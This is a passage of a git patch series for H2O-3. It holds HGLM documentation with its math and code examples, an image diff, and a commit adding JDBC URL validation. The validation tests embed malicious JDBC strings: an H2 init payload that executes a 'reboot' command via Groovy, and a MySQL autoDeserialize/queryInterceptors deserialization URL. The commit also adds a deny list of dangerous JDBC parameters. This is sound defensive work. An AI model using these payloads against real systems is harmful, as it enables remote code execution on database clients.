\text{ is } n_j \text{ by } n_j`; +- :math:`V_j = A_{rj} TA^T_{rj} + \sigma^2 I_{n_j} = Z_j TZ^T_j + \sigma^2 I_{n_j}, \text{ is } n_j \text{ by } n)j`. + +For each level-2 value :math:`j`, the likelihood can be written as: + +.. math:: + + L(Y_j; \theta_f, \sigma^2, T_j) = (2 \pi)^{-n_{j} /2} |V_j |^{-1/2} \exp \{ -\frac{1}{2} d^T_j V^{-1}_j d_j\} + +The log-likelihood is: + +.. math:: + + ll(Y_j; \theta_f, \sigma^2 , T_j) = -\frac{1}{2} \Big( n_j \log{(2 \pi)} + \log{(|V_j|)} + (Y_j - X_j \theta_f)^T V^{-1}_j (Y_j - X_j \theta_f) \Big) + +Since we assume that random effects are i.i.d., the total log-likelihood is just the sum of the log-likelihood for each level-2 value. Let :math:`T=T_j`: + +.. math:: + + ll(Y; \theta_f, \sigma^2, T) \\ + + = \sum^J_{j=1} \Big\{ - \frac{1}{2} \big( n_j \log{(2 \pi)} + \log{(|V_j|)} + (Y_j - X_j \theta_f)^T V^{-1}_j (Y_j - X_j \theta_f) \big) \Big\} = + + -\frac{1}{2} n \log{(2 \pi)} -\frac{1}{2} \Big\{ \sum^J_{j=1} \big( \log{(|V_j|)} + (Y_j - X_j \theta_f)^T V^{-1}_j (Y_j - X_j \theta_f) \big) \Big\} + +:math:`|V_j|` can be calculated as: + +.. math:: + + |V_j| = \Big|Z_j TZ^T_j + \sigma^2 I_{n_j} \Big| = \Big|T^{-1} + \frac{1}{\sigma^2} Z^T_j Z_j \Big| |T| \Big| \sigma^2 I_{n_j} \Big| = \sigma^2 \Big| T^{-1} + \frac{1}{\sigma^2} Z^T_j Z_j \Big| |T| + +where: :math:`V^{-1}_j = \frac{1}{\sigma^2} I_{n_j} - \frac{1}{\sigma^4} Z_j \Big( T^{-1} + \frac{1}{\sigma^2} Z^T_j Z_j \Big)^{-1} Z^T_j` + +:math:`(Y_j - X_j \theta_f)^T V_j^{-1} (Y_j - X_j \theta_f)` can be calculated as: + +.. math:: + + (Y_j - X_j \theta_f)^T V_j^{-1} (Y_j - X_j \theta_f) = \frac{1}{\sigma^2} (Y_j - X_j \theta_f)^T (Y_j - X_j \theta_f) - \frac{1}{\sigma^4} (Y_j - X_j \theta_f)^T Z_j (T^{-1} + \frac{1}{\sigma^2} Z^T_j Z_j)^{-1} Z^T_j (Y_j - X_J \theta_f) + +The final log-likelihood is: + +.. math:: + + ll(Y; \theta_f, \sigma^2, T) = - \frac{1}{2} n \log{(2 \pi)} - \frac{1}{2} \Big\{ \sum^J_{j=1} \big( \log{(|V_j|)} + \frac{1}{\sigma^2} (Y_j - X_j \theta_f)^T (Y_j - X_j \theta_f) \\ - \frac{1}{\sigma^4} (Y_j - X_j \theta_f)^T Z_j \big(T^{-1} + \frac{1}{\sigma^2} Z^T_j Z_j \big)^{-1} Z^T_j (Y_j - X_j \theta_f) \big) \Big\} \quad \quad \quad + +Examples +-------- + +The following are simple HGLM examples in Python and R. + +.. tabs:: + .. code-tab:: python + + # Initialize H2O-3 and import the HGLM estimator: + import h2o + h2o.init() + from h2o.estimators import H2OHGLMEstimator as hglm + + # Import the Gaussian wintercept dataset: + h2o_data = h2o.import_file("https://s3.amazonaws.com/h2o-public-test-data/smalldata/hglm_test/gaussian_0GC_678R_6enum_5num_p05oise_p08T_wIntercept_standardize.gz") + + # Split the data into training and validation sets: + train, valid = h2o_data.split_frame(ratios = [.8], seed = 1234) + + # Define the predictors and response: + y = "response" + x = h2o_data.names + x.remove("response") + x.remove("C1") + + # Set the random columns: + random_columns = ["C10","C20","C30"] + + # Build and train the model: + hglm_model = hglm(random_columns=random_columns, + group_column = "C1", + score_each_iteration=True, + seed=12345, + em_epsilon = 0.000005) + hglm_model.train(x=x, y=y, training_frame=train, validation_frame=valid) + + # Grab various metrics (model metrics, scoring history coefficients, etc.): + modelMetrics = hglm_model.training_model_metrics() + scoring_history = hglm_model.scoring_history(as_data_frame=False) + scoring_history_valid = hglm_model.scoring_history_valid(as_data_frame=False) + model_summary = hglm_model.summary() + coef = hglm_model.coef() + coef_norm = hglm_model.coef_norm() + coef_names = hglm_model.coef_names() + coef_random = hglm_model.coefs_random() + coef_random_names = hglm_model.coefs_random_names() + coef_random_norm = hglm_model.coefs_random_norm() + coef_random_names_norm = hglm_model.coefs_random_names_norm() + t_mat = hglm_model.matrix_T() + residual_var = hglm_model.residual_variance() + mse = hglm_model.mse() + mse_fixed = hglm_model.mean_residual_fixed() + mse_fixed_valid = hglm_model.mean_residual_fixed(train=False) + icc = hglm_model.icc() + + .. code-tab:: r R + + # Import the Gaussian wintercept dataset: + h2odata <- h2o.importFile("https://s3.amazonaws.com/h2o-public-test-data/smalldata/hglm_test/gaussian_0GC_allRC_2enum2numeric_p5oise_p08T_wIntercept_standardize.gz") + + # Set the predictors and response: + yresp <- "response" + predictor <- c("C2", "C3", "C4", "C5") + + # Set the random and group columns: + random_columns <- c("C2", "C3", "C4", "C5") + group_column <- "C1" + + # Build and train the model: + hglm_model <- h2o.hglm(x = predictor, + y = yresp, + training_frame = h2odata, + group_column = group_column, + random_columns = random_columns, + seed = 12345, + max_iterations = 10, + em_epsilon = 0.0000001, + random_intercept = TRUE) + + # Find the coefficient: + coeff <- h2o.coef(hglm_model) + +References +---------- + +[1] David Ruppert, M. P. Wand and R. J. Carroll, Semiparametric Regression, Chapter 4, Cambridge University Press, 2003. + +[2] Stephen w. Raudenbush, Anthony S. Bryk, Hierarchical Linear Models Applications and Data Analysis Methods, Second Edition, Sage Publications, 2002. + +[3] Rao, C. R. (1973). Linear Statistical Inference and Its Applications. New York: Wiley. + +[4] Dempster, A. P., Laird, N. M., & Rubin, D. B. (1977). Maximum likelihood from incomplete data via the EM algorithm. Journal of the Royal Statistical Society, Seires B, 39, 1-8. + +[5] Matrix determinant lemma: https://en.wikipedia.org/wiki/Matrix_determinant_lemma. + +[6] Woodbury matrix identity: https://en.wikipedia.org/wiki/Woodbury_matrix_identity. \ No newline at end of file diff --git a/h2o-docs/src/product/images/HGLM.png b/h2o-docs/src/product/images/HGLM.png new file mode 100644 index 0000000000000000000000000000000000000000..a21e438b9172088444de21e4ba8199fe5e322329 GIT binary patch literal 9054 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 LF04S=D)`?3B0vth literal 0 HcmV?d00001 diff --git a/h2o-docs/src/product/parameters.rst b/h2o-docs/src/product/parameters.rst index e785975a42fc..edd607a41b6d 100644 --- a/h2o-docs/src/product/parameters.rst +++ b/h2o-docs/src/product/parameters.rst @@ -53,7 +53,6 @@ This Appendix provides detailed descriptions of parameters that can be specified data-science/algo-params/fold_column data-science/algo-params/gainslift_bins data-science/algo-params/gradient_epsilon - data-science/algo-params/hglm data-science/algo-params/histogram_type data-science/algo-params/huber_alpha data-science/algo-params/ignore_const_cols From ac1d642b4d86f10a02d75974055baf2a4b2025ac Mon Sep 17 00:00:00 2001 From: krasinski <8573352+krasinski@users.noreply.github.com> Date: Sun, 27 Oct 2024 17:13:03 +0100 Subject: [PATCH 12/12] GH-16425 Add JDBC parameter validation [nocheck] (#16432) * GH-16425 Add JDBC parameter validation * swap exception expectation --- .../src/main/java/water/jdbc/SQLManager.java | 45 +++++++++++++++++++ .../test/java/water/jdbc/SQLManagerTest.java | 20 +++++++++ 2 files changed, 65 insertions(+) diff --git a/h2o-core/src/main/java/water/jdbc/SQLManager.java b/h2o-core/src/main/java/water/jdbc/SQLManager.java index 855b20838687..8b148d706a81 100644 --- a/h2o-core/src/main/java/water/jdbc/SQLManager.java +++ b/h2o-core/src/main/java/water/jdbc/SQLManager.java @@ -5,10 +5,20 @@ import water.parser.ParseDataset; import water.util.Log; +import java.io.UnsupportedEncodingException; +import java.net.URI; +import java.net.URISyntaxException; +import java.net.URLDecoder; import java.sql.*; +import java.util.Arrays; +import java.util.List; import java.util.Objects; import java.util.concurrent.ArrayBlockingQueue; import java.util.concurrent.atomic.AtomicLong; +import java.util.regex.Matcher; +import java.util.regex.Pattern; +import java.util.stream.Collectors; +import java.util.stream.Stream; public class SQLManager { @@ -30,6 +40,15 @@ public class SQLManager { private static final String TMP_TABLE_ENABLED = H2O.OptArgs.SYSTEM_PROP_PREFIX + "sql.tmp_table.enabled"; + private static final String DISALLOWED_JDBC_PARAMETERS_PARAM = H2O.OptArgs.SYSTEM_PROP_PREFIX + "sql.jdbc.disallowed.parameters"; + + private static final Pattern JDBC_PARAMETERS_REGEX_PATTERN = Pattern.compile("(?i)[?;&]([a-z]+)="); + + private static final List DEFAULT_JDBC_DISALLOWED_PARAMETERS = Stream.of( + "autoDeserialize", "queryInterceptors", "allowLoadLocalInfile", "allowMultiQueries", //mysql + "allowLoadLocalInfileInPath", "allowUrlInLocalInfile", "allowPublicKeyRetrieval", //mysql + "init", "script", "shutdown" //h2 + ).map(String::toLowerCase).collect(Collectors.toList()); private static AtomicLong NEXT_TABLE_NUM = new AtomicLong(0); static Key nextTableKey(String prefix, String postfix) { @@ -58,6 +77,7 @@ public static Job importSqlTable( final String username, final String password, final String columns, final Boolean useTempTable, final String tempTableName, final SqlFetchMode fetchMode, final Integer numChunksHint) { + validateJdbcUrl(connection_url); final Key destination_key = nextTableKey(table, "sql_to_hex"); final Job j = new Job<>(destination_key, Frame.class.getName(), "Import SQL Table"); @@ -533,6 +553,7 @@ private static int estimateConcurrentConnections(final int cloudSize, final shor * @throws SQLException if a database access error occurs or the url is */ public static Connection getConnectionSafe(String url, String username, String password) throws SQLException { + validateJdbcUrl(url); initializeDatabaseDriver(getDatabaseType(url)); try { return DriverManager.getConnection(url, username, password); @@ -588,6 +609,30 @@ static void initializeDatabaseDriver(String databaseType) { } } + public static void validateJdbcUrl(String jdbcUrl) throws IllegalArgumentException { + if (jdbcUrl == null || jdbcUrl.trim().isEmpty()) { + throw new IllegalArgumentException("JDBC URL is null or empty"); + } + + if (!jdbcUrl.toLowerCase().startsWith("jdbc:")) { + throw new IllegalArgumentException("JDBC URL must start with 'jdbc:'"); + } + + Matcher matcher = JDBC_PARAMETERS_REGEX_PATTERN.matcher(jdbcUrl); + String property = System.getProperty(DISALLOWED_JDBC_PARAMETERS_PARAM); + List disallowedParameters = property == null ? + DEFAULT_JDBC_DISALLOWED_PARAMETERS : + Arrays.stream(property.split(",")).map(String::toLowerCase).collect(Collectors.toList()); + + while (matcher.find()) { + String key = matcher.group(1); + if (disallowedParameters.contains(key.toLowerCase())) { + throw new IllegalArgumentException("Potentially dangerous JDBC parameter found: " + key + + ". That behavior can be altered by setting " + DISALLOWED_JDBC_PARAMETERS_PARAM + " env variable to another comma separated list."); + } + } + } + static class SqlTableToH2OFrameStreaming { final String _table, _columns, _databaseType; final int _numCol; diff --git a/h2o-core/src/test/java/water/jdbc/SQLManagerTest.java b/h2o-core/src/test/java/water/jdbc/SQLManagerTest.java index d52febaa50f8..179311eebeec 100644 --- a/h2o-core/src/test/java/water/jdbc/SQLManagerTest.java +++ b/h2o-core/src/test/java/water/jdbc/SQLManagerTest.java @@ -145,4 +145,24 @@ public void testBuildSelectChunkSql() { Assert.assertEquals("SELECT * FROM mytable LIMIT 1310 OFFSET 0", SQLManager.buildSelectChunkSql("", "mytable", 0, 1310, "*", null)); } + + @Test + public void testValidateJdbcConnectionStringH2() { + exception.expect(IllegalArgumentException.class); + exception.expectMessage("Potentially dangerous JDBC parameter found: init"); + + String h2MaliciousJdbc = "jdbc:h2:mem:test;MODE=MSSQLServer;init=CREATE ALIAS RBT AS '@groovy.transform.ASTTest(value={ assert java.lang.Runtime.getRuntime().exec(\"reboot\")" + "})" + "def rbt" + "'"; + + SQLManager.validateJdbcUrl(h2MaliciousJdbc); + } + + @Test + public void testValidateJdbcConnectionStringMysql() { + exception.expect(IllegalArgumentException.class); + exception.expectMessage("Potentially dangerous JDBC parameter found: autoDeserialize"); + + String mysqlMaliciousJdbc = "jdbc:mysql://domain:123/test?autoDeserialize=true&queryInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor&user=abcd"; + + SQLManager.validateJdbcUrl(mysqlMaliciousJdbc); + } }